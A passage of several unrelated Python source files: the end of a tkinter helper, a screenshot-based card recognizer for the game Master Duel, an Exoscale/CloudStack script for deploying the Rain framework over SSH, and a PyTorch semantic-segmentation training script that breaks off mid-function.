raise_window_up(window)
global processed
processed = True
close_thread = threading.Thread(target=partial(detect_and_close,window))
close_thread.start()
window.mainloop()
def raise_window_up(window):
window.attributes('-topmost', 1)
def get_screen_size(window):
return window.winfo_screenwidth(),window.winfo_screenheight()
def get_window_size(window):
return window.winfo_reqwidth(),window.winfo_reqheight()
def center_window(window, width, height):
screenwidth = window.winfo_screenwidth()
screenheight = window.winfo_screenheight()
size = '%dx%d+%d+%d' % (width, height, (screenwidth - width)/2, (screenheight - height)/2)
print(size)
window.geometry(size)
def detect_and_close(window):
while(1):
if finished:
window.destroy()
if __name__ == '__main__':
listen = threading.Thread(target=listen_keyboard)
listen.start()
# stop_recording = threading.Thread(target=stop_and_process)
# stop_recording.start()
|
master_duel_auto_scan_version.py
|
import os
from re import M
import sys
from threading import Thread
import time
from PIL import Image, ImageFile
import dhash
import sqlite3
import win32api
import win32process
import win32gui
import win32ui
import win32con
import win32print
from ctypes import windll
import keyboard
ImageFile.LOAD_TRUNCATED_IMAGES = True
Image.MAX_IMAGE_PIXELS = None
# global variable to pass card to gui
g_card_show = None
_img_p = ['.png', '.jpg']
# ygo card image area y1-y2
y_1 = (130/700)
y_2 = (490/700)
# ygo card image area x1-x2
x_1 = (60/480)
x_2 = (424/480)
# 决定每次检测之后显示最相似的条目总数(避免可能的识别误差)
show_search_limit = 1
md_process_name = 'masterduel.exe'
md_process_window_name = 'masterduel'
# for regenerate card image
fileDir = './origin_ygo_img'
c_dhash_dir = './card_image_check.db'
c_ygo_dir = './cards.cdb'
pause_hotkey = 'ctrl+p'
exit_hotkey = 'ctrl+q'
switch_hotkey = 'ctrl+s'
# for debug
#debug_raw_img1 = './simple_img/s5.png'
# screen_shot for 1920X1080
# shot where card image locate
# deck
deck_left_top = (64, 200)
deck_right_bottom = (64+144, 200+210)
# duel
duel_left_top = (40, 208)
duel_right_bottom = (40+168, 208+244)
def cls():
os.system('cls' if os.name == 'nt' else 'clear')
def hammingDist(s1, s2):
assert len(s1) == len(s2)
return sum([ch1 != ch2 for ch1, ch2 in zip(s1, s2)])
def getFileList(dir, fileList):
newDir = dir
if os.path.isfile(dir):
fileList.append(dir)
elif os.path.isdir(dir):
for s in os.listdir(dir):
if os.path.splitext(s)[-1] not in _img_p:
continue
newDir = os.path.join(dir, s)
getFileList(newDir, fileList)
return fileList
def generate_card_img_basic_dhash(_list):
conn = sqlite3.connect(c_dhash_dir)
c = conn.cursor()
c.execute(
''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='CardDhash' ''')
if c.fetchone()[0] != 1:
conn.execute(
'''
CREATE TABLE CardDhash
(id INTEGER PRIMARY KEY AUTOINCREMENT,
code TEXT NOT NULL,
dhash TEXT NOT NULL
);'''
)
c.execute(''' SELECT count(*) FROM CardDhash ''')
if c.fetchone()[0] == 0:
counter = 0
for _img_path in _list:
_img = Image.open(_img_path)
_y_1 = int(_img.height*y_1)
_y_2 = int(_img.height*y_2)
_x_1 = int(_img.width*x_1)
_x_2 = int(_img.width*x_2)
_img = _img.crop((_x_1, _y_1, _x_2, _y_2))
row, col = dhash.dhash_row_col(_img)
_img.close()
_temp_dhash = dhash.format_hex(row, col)
if _temp_dhash is None:
print(f'Unbale read {_img_path},next')
continue
counter += 1
_file_name = os.path.basename(_img_path).split('.')[0]
# _cache.append({
# 'code':_file_name,
# 'dhash':_temp_dhash
# })
conn.execute(
f"INSERT INTO CardDhash (code,dhash) VALUES ('{_file_name}', '{_temp_dhash}' )")
print(f"{counter} time,generate card {_file_name} dhash {_temp_dhash}")
print("generate done")
conn.commit()
conn.close()
def get_card_img_dhash_cache():
conn = sqlite3.connect(c_dhash_dir)
c = conn.cursor()
c.execute(
''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='CardDhash' ''')
if c.fetchone()[0] != 1:
print("No table find")
conn.close()
return None
c.execute(''' SELECT count(*) FROM CardDhash ''')
if c.fetchone()[0] == 0:
print("No data Init")
conn.close()
return None
cache = []
cursor = conn.execute("SELECT code,dhash from CardDhash")
for row in cursor:
cache.append(
{
'code': row[0],
'dhash': row[1]
}
)
conn.close()
return cache
def get_game_window_info():
hwnd = win32gui.FindWindow(0, md_process_window_name)
return hwnd
def get_game_window_info():
hwnd = win32gui.FindWindow(0, md_process_window_name)
return hwnd
def window_shot_image(hwnd: int):
app = win32gui.GetWindowText(hwnd)
if not hwnd or hwnd <= 0 or len(app) == 0:
return False, '无法找到游戏进程,不进行操作'
isiconic = win32gui.IsIconic(hwnd)
if isiconic:
return False, '游戏处于最小化窗口状态,无法获取屏幕图像,不执行操作'
left, top, right, bot = win32gui.GetClientRect(hwnd)
w = right - left
h = bot - top
# 获取屏幕未缩放分辨率
hDc = win32gui.GetDC(0)
_screen_w = win32print.GetDeviceCaps(hDc, win32con.DESKTOPHORZRES)
_screen_h = win32print.GetDeviceCaps(hDc, win32con.DESKTOPVERTRES)
_current_screen_w = win32api.GetSystemMetrics(0)
_current_screen_h = win32api.GetSystemMetrics(1)
desktop_global_resize_w_zoom = _current_screen_w/_screen_w
desktop_global_resize_h_zoom = _current_screen_h/_screen_h
hwndDC = win32gui.GetWindowDC(hwnd)
mfcDC = win32ui.CreateDCFromHandle(hwndDC)
saveDC = mfcDC.CreateCompatibleDC()
saveBitMap = win32ui.CreateBitmap()
saveBitMap.CreateCompatibleBitmap(mfcDC, w, h)
saveDC.SelectObject(saveBitMap)
result = windll.user32.PrintWindow(hwnd, saveDC.GetSafeHdc(), 3)
bmpinfo = saveBitMap.GetInfo()
bmpstr = saveBitMap.GetBitmapBits(True)
im = Image.frombuffer(
'RGB',
(bmpinfo['bmWidth'], bmpinfo['bmHeight']),
bmpstr, 'raw', 'BGRX', 0, 1)
win32gui.DeleteObject(saveBitMap.GetHandle())
saveDC.DeleteDC()
mfcDC.DeleteDC()
win32gui.ReleaseDC(hwnd, hwndDC)
if result != 1:
return False, "无法创建屏幕图像缓存"
print(f"Win32返回的游戏窗口分辨率({w}x{h}),桌面长宽缩放倍率({desktop_global_resize_w_zoom},{desktop_global_resize_h_zoom}),相关坐标将会进行缩放,缩放比率将为({w/1920/desktop_global_resize_w_zoom},{h/1080/desktop_global_resize_h_zoom})")
return True, {
"image": im,
"current_window_zoom": (w/1920/desktop_global_resize_w_zoom, h/1080/desktop_global_resize_h_zoom),
}
def get_image_db_cache():
generate_card_img_basic_dhash(getFileList(fileDir, []))
_db_image_cache = get_card_img_dhash_cache()
return _db_image_cache
def cv_card_info_at_deck_room(debug: bool = False):
hwnd = get_game_window_info()
status, result = window_shot_image(hwnd)
if not status:
print(result)
return None
zoom_w = result['current_window_zoom'][0]
zoom_h = result['current_window_zoom'][1]
_crop_area = (int(deck_left_top[0]*zoom_w),
int(deck_left_top[1]*zoom_h),
int(deck_right_bottom[0]*zoom_w),
int(deck_right_bottom[1]*zoom_h))
_img = result['image'].crop(_crop_area)
if debug:
print("debug:store first crop deck card locate(first_crop_deck)")
_img.save("./first_crop_deck.png")
_y_1 = int(_img.height*y_1)
_y_2 = int(_img.height*y_2)
_x_1 = int(_img.width*x_1)
_x_2 = int(_img.width*x_2)
_img = _img.crop((_x_1, _y_1, _x_2, _y_2))
if debug:
print("debug:store second crop deck card locate(second_crop_deck)")
_img.save("./second_crop_deck.png")
row, col = dhash.dhash_row_col(_img)
target_img_dhash = dhash.format_hex(row, col)
return target_img_dhash
def cv_card_info_at_duel_room(debug: bool = False):
hwnd = get_game_window_info()
status, result = window_shot_image(hwnd)
if not status:
print(result)
return None
zoom_w = result['current_window_zoom'][0]
zoom_h = result['current_window_zoom'][1]
_crop_area = (int(duel_left_top[0]*zoom_w),
int(duel_left_top[1]*zoom_h),
int(duel_right_bottom[0]*zoom_w),
int(duel_right_bottom[1]*zoom_h))
_img = result['image'].crop(_crop_area)
if debug:
print("debug:store first crop duel card locate(first_crop_duel)")
_img.save("./first_crop_duel.png")
_y_1 = int(_img.height*y_1)
_y_2 = int(_img.height*y_2)
_x_1 = int(_img.width*x_1)
_x_2 = int(_img.width*x_2)
_img = _img.crop((_x_1, _y_1, _x_2, _y_2))
if debug:
print("debug:store second crop duel card locate(second_crop_duel)")
_img.save("./second_crop_duel.png")
row, col = dhash.dhash_row_col(_img)
target_img_dhash = dhash.format_hex(row, col)
return target_img_dhash
def translate(type: int, cache: list, debug: bool = False, ygo_sql_ins=None):
if cache is None or len(cache) == 0:
print("无法读取图像指纹信息,不执行操作(card_image_check.db是不是12K,是的话这是个空库没数据的)")
return
cls()
get_at = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
print(f"检测时间:{get_at}")
start_time = time.time()
if type == 1:
print("翻译卡组卡片")
dhash_info = cv_card_info_at_deck_room(debug)
elif type == 2:
print("翻译决斗卡片")
dhash_info = cv_card_info_at_duel_room(debug)
else:
print("not support")
return
if not dhash_info:
return
results = []
for _img_dhash in cache:
d_score = 1 - hammingDist(dhash_info,
_img_dhash['dhash']) * 1. / (32 * 32 / 4)
results.append({
'card': _img_dhash['code'],
'score': d_score
})
results.sort(key=lambda x: x['score'], reverse=True)
if len(results) > show_search_limit:
results = results[:show_search_limit]
end_time = time.time()
if not ygo_sql_ins:
ygo_sql = sqlite3.connect(c_ygo_dir)
else:
ygo_sql = ygo_sql_ins
for card in results:
try:
cursor = ygo_sql.execute(
f"SELECT name,desc from texts WHERE id='{card['card']}' LIMIT 1")
except:
print("读取ygo数据库异常,是不是没有将card.cdb放进来")
return
if cursor.arraysize != 1:
print(f"card {card['card']} not found")
if not ygo_sql_ins:
ygo_sql.close()
return
data = cursor.fetchone()
print(data)
card['name'] = data[0]
card['desc'] = data[1]
if not ygo_sql_ins:
ygo_sql.close()
print('匹配用时: %.6f 秒' % (end_time-start_time))
print(f"识别结果【匹配概率由高到低排序】")
# pass first result to gui
global g_card_show
g_card_show = results[0]
for card in results:
if card['score'] < 0.93:
print("警告:相似度匹配过低,可能游戏卡图与缓存库的版本卡图不同或未知原因截图区域错误\n修改enable_debug查看截取图片信息分析原因\n")
print(
f"{card['name']}(密码:{card['card']},相似度:{card['score']})\n{card['desc']}\n")
print("-----------------------------------")
print(f"{switch_hotkey}切换检测卡组/决斗详细卡片信息,{pause_hotkey}暂停检测,{exit_hotkey}退出程序\n请确保您已经点开了目标卡片的详细信息!!!")
translate_type = 0
pause = True
process_exit = False
enable_debug = False
def translate_check_thread():
global translate_type
global pause
global process_exit
global enable_debug
cache = get_image_db_cache()
ygo_sql = sqlite3.connect(c_ygo_dir)
while(not process_exit):
if pause:
cls()
print("暂停")
print(
f"{switch_hotkey}切换检测卡组/决斗详细卡片信息,{pause_hotkey}暂停检测,{exit_hotkey}退出程序\n请确保您已经点开了目标卡片的详细信息!!!")
elif translate_type == 0:
translate(translate_type+1, cache, enable_debug, ygo_sql)
elif translate_type == 1:
translate(translate_type+1, cache, enable_debug, ygo_sql)
else:
print("Unknown Operator")
time.sleep(1)
ygo_sql.close()
print("程序结束")
def status_change(switch: bool, need_pause: bool, exit: bool):
global translate_type
global pause
global process_exit
global enable_debug
process_exit = exit
pause = need_pause
if switch:
translate_type = int(not bool(translate_type))
def main():
# cache=get_image_db_cache()
# enable_debug=False
# print("shift+g翻译卡组卡片,shift+f翻译决斗中卡片,esc关闭\n请确保您已经点开了目标卡片的详细信息!!!")
# keyboard.add_hotkey('shift+g',translate,args=(1,cache,enable_debug))
# keyboard.add_hotkey('shift+f',translate,args=(2,cache,enable_debug))
# keyboard.wait('ctrl+q')
# print("程序结束")
keyboard.add_hotkey(switch_hotkey, status_change,
args=(True, False, False))
keyboard.add_hotkey(exit_hotkey, status_change, args=(False, False, True))
keyboard.add_hotkey(pause_hotkey, status_change, args=(False, True, False))
p = Thread(target=translate_check_thread)
p.start()
p.join()
if __name__ == '__main__':
main()
|
exoscale.py
|
import json
from cs import CloudStack, read_config
import argparse
import os
import paramiko
import base64
import multiprocessing
from collections import OrderedDict
from scp import SCPClient
import time
def print_pretty(json_data):
print(json.dumps(json_data, indent=4, sort_keys=True))
cs = CloudStack(**read_config())
OFFERINGS = {o["name"].lower(): o["id"] for o in cs.listServiceOfferings()["serviceoffering"]}
ZONES = {z["name"].lower(): z["id"] for z in cs.listZones()["zone"]}
SSH_KEY_PAIRS = [kp["name"] for kp in cs.listSSHKeyPairs()["sshkeypair"]]
VIRTUAL_MACHINES = cs.listVirtualMachines()
TEMPLATE_OFFERINGS = cs.listTemplates(templatefilter="executable")
NETWORK_OFFERINGS = cs.listNetworkOfferings()
SECURITY_GROUPS = cs.listSecurityGroups()
INIT_SCRIPT = """
#cloud-config
runcmd:
- apt-get update
- apt-get install -y python3-pip
- touch /ready
""" # noqa
SSH_CMD = "ssh -o StrictHostKeyChecking=no"
SSH_USERNAME = "ubuntu"
SSH_PORT = 22
def create_ssh_session(hostname):
s = paramiko.SSHClient()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
s.connect(hostname, SSH_PORT, SSH_USERNAME)
return s
def wait_ready(args):
print("Waiting for environment deployment")
print("This may take take a while")
time.sleep(5)
ips = get_nodes(args).values()
while any(ip is None for ip in ips):
print("Waiting for IP address ...")
time.sleep(5)
ips = get_nodes(args).values()
for ip in ips:
while True:
try:
print("Trying to connect to {} ...".format(ip))
sess = create_ssh_session(ip)
sftp = sess.open_sftp()
break
except paramiko.ssh_exception.NoValidConnectionsError:
time.sleep(5)
while True:
try:
sftp.stat("/ready")
print("{} ready".format(ip))
break
except IOError:
time.sleep(5)
print("Waiting for startup of {}".format(ip))
def create(args):
if os.path.exists(args.env):
print("Error: {} already exists. Destroy the environment "
"or create a new one using the --env switch".format(args.env))
exit(1)
print("Creating {}...".format(args.env))
vms = []
for i in range(args.n):
vms.append(cs.deployVirtualMachine(
name="{}-{}".format(args.name, i),
serviceOfferingId=OFFERINGS[args.offering],
# templateId="4fedad2b-e96c-4a70-95f7-a9142995dba4",
# templateId="709687a4-35a7-4bfe-af24-aa00f3f391e8", # Ubuntu 17.10
templateId="4c9f5519-730f-46cb-b292-4e73ca578947", # Ubuntu 18.04
zoneId=ZONES[args.zone],
userdata=base64.b64encode(INIT_SCRIPT.encode("utf-8")),
keypair=args.keypair))
with open(args.env, "w") as f:
f.write(json.dumps(vms))
wait_ready(args)
print("{} created".format(args.env))
def destroy(args):
print("Destroying {}...".format(args.env))
with open(args.env, "r") as f:
vms = json.loads(f.read())
for vm in vms:
cs.destroyVirtualMachine(id=vm["id"])
os.remove(args.env)
print("{} destroyed".format(args.env))
def get_nodes(args):
with open(args.env, "r") as f:
ids = [vm["id"] for vm in json.loads(f.read())]
ips = OrderedDict((vm["name"], vm["nic"][0].get("ipaddress"))
for vm in cs.listVirtualMachines()["virtualmachine"]
if vm["id"] in ids)
return ips
def list_ips(args):
print("Listing IP addresses...")
print(get_nodes(args))
def ssh(args):
ip = list(get_nodes(args).values())[args.n]
os.system("{} {}@{}".format(SSH_CMD, SSH_USERNAME, ip))
def _scp(node, src, dst):
sess = create_ssh_session(node)
scp = SCPClient(sess.get_transport())
scp.put(src, recursive=True, remote_path=dst)
sess.close()
def scp(args):
nodes = list(get_nodes(args).values())
if args.n is not None:
nodes = [nodes[args.n]]
processes = []
for n in nodes:
p = multiprocessing.Process(target=_scp, args=(n, args.src, args.dst))
p.start()
processes.append(p)
[p.join() for p in processes]
def _cmd(node, cmd):
sess = create_ssh_session(node)
stdin, stdout, stderr = sess.exec_command(cmd)
print(stderr.read())
print(stdout.read().decode("utf-8"))
sess.close()
def cmd(args):
nodes = list(get_nodes(args).values())
if args.n is not None:
nodes = [nodes[args.n]]
processes = []
for n in nodes:
p = multiprocessing.Process(target=_cmd, args=(n, args.cmd))
p.start()
processes.append(p)
[p.join() for p in processes]
def install_node(k, nodes, hosts, pub_key):
sess = create_ssh_session(nodes[k])
channel = sess.invoke_shell()
stdin = channel.makefile("wb")
stdout = channel.makefile("rb")
stderr = channel.makefile_stderr("rb")
stdin.write("echo '{}' >> ~/.ssh/authorized_keys\n".format(pub_key))
stdin.write("echo -e '{}' | sudo tee --append /etc/hosts\n".format(hosts))
if args.rain_binary:
os.system("scp {} {}@{}:~/rain ".format(args.rain_bin, SSH_USERNAME, nodes[k]))
stdin.write("sudo mv ~/rain /usr/local/bin/rain\n")
if args.rain_wheel:
rain_whl = os.path.basename(args.rain_wheel)
os.system("scp {} {}@{}:~/{}".format(args.rain_wheel, SSH_USERNAME, nodes[k], rain_whl))
stdin.write("pip3 install ~/{}\n".format(rain_whl))
if args.rain_download:
url_base = "https://github.com/substantic/rain/releases/download"
nightly = ""
if ".dev" in args.rain_download:
nightly = "nightly-"
bin_url = ("{}/{}v{}/rain-v{}-linux-x64.tar.xz"
.format(url_base, nightly, args.rain_download, args.rain_download))
stdin.write("wget -O ~/rain.tar.xz {}\n".format(bin_url))
stdin.write("tar xf ~/rain.tar.xz\n")
stdin.write("sudo mv ./rain-v{}-linux-x64/rain /usr/local/bin/\n"
.format(args.rain_download))
rain_whl = "rain_python-{}-py3-none-any.whl".format(args.rain_download)
python_url = ("{}/{}v{}/{}"
.format(url_base, nightly, args.rain_download, rain_whl))
stdin.write("wget {}\n".format(python_url))
stdin.write("pip3 install ~/{}\n".format(rain_whl))
stdin.write("echo -e '{}' > ~/node-list\n".format("\n".join(nodes)))
stdin.write("exit\n")
print(stderr.read())
print(stdout.read().decode("utf-8"))
stdout.close()
stdin.close()
sess.close()
def install(args):
print("Installing Rain...")
nodes = get_nodes(args)
server_ip = list(nodes.values())[0]
os.popen("{} {}@{} \"ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa\""
.format(SSH_CMD, SSH_USERNAME, server_ip)).read()
pub_key = os.popen("{} {}@{} \"cat ~/.ssh/id_rsa.pub\""
.format(SSH_CMD, SSH_USERNAME, server_ip)).read().rstrip()
hosts = "\n".join(["{} {}".format(nodes[k], k) for k in nodes.keys()])
processes = []
for k in nodes.keys():
p = multiprocessing.Process(target=install_node, args=(k, nodes, hosts, pub_key))
p.start()
processes.append(p)
[p.join() for p in processes]
print("Rain installed")
def start(args):
nodes = get_nodes(args)
server_ip = list(nodes.values())[0]
os.popen("{} {}@{} \"rain start --governor-host-file ~/node-list\""
.format(SSH_CMD, SSH_USERNAME, server_ip))
print("Server IP: {}".format(list(nodes.values())[0]))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(help="sub-command help")
parser_create = subparsers.add_parser("create", help="create help")
parser_create.add_argument("-n", help="Number of virtual machines", type=int, default=1)
parser_create.add_argument("--name", help="Virtual machine name prefix", default="default")
parser_create.add_argument("--env", help="Path to environment file", default="default.env")
parser_create.add_argument("--keypair", choices=SSH_KEY_PAIRS,
help="SSH key name", required=True)
parser_create.add_argument("--offering", choices=OFFERINGS.keys(), default="small",
help="Service offering")
parser_create.add_argument("--zone", choices=ZONES.keys(), default="at-vie-1", help="Zone")
parser_create.set_defaults(func=create)
parser_destroy = subparsers.add_parser("destroy", help="destroy help")
parser_destroy.add_argument("--env", help="Path to environment file", default="default.env")
parser_destroy.set_defaults(func=destroy)
parser_ips = subparsers.add_parser("list-nodes", help="list nodes")
parser_ips.add_argument("--env", help="Path to environment file", default="default.env")
parser_ips.set_defaults(func=list_ips)
parser_ssh = subparsers.add_parser("ssh", help="SSH into n-th node")
parser_ssh.add_argument("n", help="Node index", type=int)
parser_ssh.add_argument("--env", help="path to environment file", default="default.env")
parser_ssh.set_defaults(func=ssh)
parser_scp = subparsers.add_parser("scp", help="Secure copy data")
parser_scp.add_argument("src", help="Source path")
parser_scp.add_argument("dst", help="Destination path")
parser_scp.add_argument("--env", help="path to environment file", default="default.env")
parser_scp.add_argument("--n", help="Node index", type=int)
parser_scp.set_defaults(func=scp)
parser_cmd = subparsers.add_parser("cmd", help="Execute command")
parser_cmd.add_argument("cmd", help="Source path")
parser_cmd.add_argument("--env", help="path to environment file", default="default.env")
parser_cmd.add_argument("--n", help="Node index", type=int)
parser_cmd.set_defaults(func=cmd)
parser_install = subparsers.add_parser("install", help="install help")
parser_install.add_argument("--env", help="path to environment file", default="default.env")
parser_install.add_argument("--rain-download", help="rain release version")
parser_install.add_argument("--rain-binary", help="path to Rain binary")
parser_install.add_argument("--rain-wheel", help="path to Rain Python wheel")
parser_install.set_defaults(func=install)
parser_start = subparsers.add_parser("start", help="start help")
parser_start.add_argument("--env", help="path to environment file", default="default.env")
parser_start.add_argument("-S", help="passes -S to rain start command")
parser_start.set_defaults(func=start)
args = parser.parse_args()
args.func(args)
|
segment.py
|
#!/shared/xudongliu/anaconda3/envs/f_torch04/bin/python
import argparse
import json
import logging
import os
import threading
from os.path import exists, join, split, dirname
import time
import numpy as np
import shutil
import sys
from PIL import Image
import torch
import torch.utils.data
from torch import nn
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
import dla_up
import data_transforms as transforms
import dataset
from miou import RunningConfusionMatrix
from models.segnet_new import SegNet
try:
from modules import batchnormsync
HAS_BN_SYNC = True
except ImportError:
HAS_BN_SYNC = False
FORMAT = "[%(asctime)-15s %(filename)s:%(lineno)d %(funcName)s] %(message)s"
logging.basicConfig(format=FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
CITYSCAPE_PALLETE = np.asarray([
[128, 64, 128],
[244, 35, 232],
[70, 70, 70],
[102, 102, 156],
[190, 153, 153],
[153, 153, 153],
[250, 170, 30],
[220, 220, 0],
[107, 142, 35],
[152, 251, 152],
[70, 130, 180],
[220, 20, 60],
[255, 0, 0],
[0, 0, 142],
[0, 0, 70],
[0, 60, 100],
[0, 80, 100],
[0, 0, 230],
[119, 11, 32],
[0, 0, 0]], dtype=np.uint8)
class SegList(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, list_dir=None,
out_name=False, out_size=False, binary=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.out_size = out_size
self.binary = binary
self.read_lists()
def __getitem__(self, index):
image = Image.open(join(self.data_dir, self.image_list[index]))
data = [image]
if self.label_list is not None:
label_map = Image.open(join(self.data_dir, self.label_list[index]))
if self.binary:
label_map = Image.fromarray(
(np.array(label_map) > 0).astype(np.uint8))
data.append(label_map)
if self.bbox_list is not None:
data.append(Image.open(join(self.data_dir, self.bbox_list[index])))
data = list(self.transforms(*data))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
if self.out_size:
data.append(torch.from_numpy(np.array(image.size, dtype=int)))
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
bbox_path = join(self.list_dir, self.phase + '_bboxes.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
if exists(bbox_path):
self.bbox_list = [line.strip() for line in open(bbox_path, 'r')]
assert len(self.image_list) == len(self.bbox_list)
class SegListMS(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, scales, list_dir=None):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
self.scales = scales
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
w, h = data[0].size
if self.label_list is not None:
data.append(Image.open(join(self.data_dir,
self.label_list[index])))
# data = list(self.transforms(*data))
if len(data) > 1:
out_data = list(self.transforms(*data))
else:
out_data = [self.transforms(*data)]
ms_images = [self.transforms(data[0].resize((int(w * s), int(h * s)),
Image.BICUBIC))
for s in self.scales]
out_data.append(self.image_list[index])
out_data.extend(ms_images)
return tuple(out_data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
def validate(val_loader, model, criterion, eval_score=None, print_freq=10):
# miou part >>>
confusion_labels = np.arange(0, 19)
confusion_matrix = RunningConfusionMatrix(confusion_labels)
# miou part <<<
batch_time = AverageMeter()
losses = AverageMeter()
score = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
confusion_matrix.update_matrix(target, output)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
score.update(eval_score(output, target_var), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {score.val:.3f} ({score.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
score=score), flush=True)
miou, top_1, top_5 = confusion_matrix.compute_current_mean_intersection_over_union()
print(' * Score {top1.avg:.3f}'.format(top1=score))
print(' * mIoU {top1:.3f}'.format(top1=miou))
confusion_matrix.show_classes()
return miou
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct[target != 255]
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data[0]
def train(train_loader, model, criterion, optimizer, epoch,
eval_score=None, print_freq=10):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# pdb.set_trace()
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
scores.update(eval_score(output, target_var), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=scores))
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
args = parse_args()
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, join(args.checkpoint_dir, 'model_best.pth.tar'))
def train_seg(args):
batch_size = args.batch_size
num_workers = args.workers
crop_size = args.crop_size
checkpoint_dir = args.checkpoint_dir
print(' '.join(sys.argv))
for k, v in args.__dict__.items():
print(k, ':', v)
pretrained_base = args.pretrained_base
single_model = SegNet(args.classes)
# single_model = dla_up.__dict__.get(args.arch)(
# args.classes, pretrained_base, down_ratio=args.down)
model = torch.nn.DataParallel(single_model).cuda()
if args.edge_weight > 0:
weight = torch.from_numpy(
np.array([1, args.edge_weight], dtype=np.float32))
criterion = nn.NLLLoss2d(ignore_index=255, weight=weight)
else:
criterion = nn.NLLLoss2d(ignore_index=255)
criterion.cuda()
data_dir = args.data_dir
info = dataset.load_dataset_info(data_dir)
normalize = transforms.Normalize(mean=info.mean, std=info.std)
t = []
if args.random_rotate > 0:
t.append(transforms.RandomRotate(args.random_rotate))
if args.random_scale > 0:
t.append(transforms.RandomScale(args.random_scale))
t.append(transforms.RandomCrop(crop_size))
if args.random_color:
t.append(transforms.RandomJitter(0.4, 0.4, 0.4))
t.extend([transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize])
train_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'train', transforms.Compose(t),
binary=(args.classes == 2)),
batch_size=batch_size, shuffle=True, num_workers=num_workers,
pin_memory=True
)
val_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'val', transforms.Compose([
transforms.RandomCrop(crop_size),
# transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]), binary=(args.classes == 2)),
batch_size=4, shuffle=False, num_workers=num_workers,
pin_memory=True
)
optimizer = torch.optim.SGD(single_model.parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
cudnn.benchmark = True
best_prec1 = 0
start_epoch = 0
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
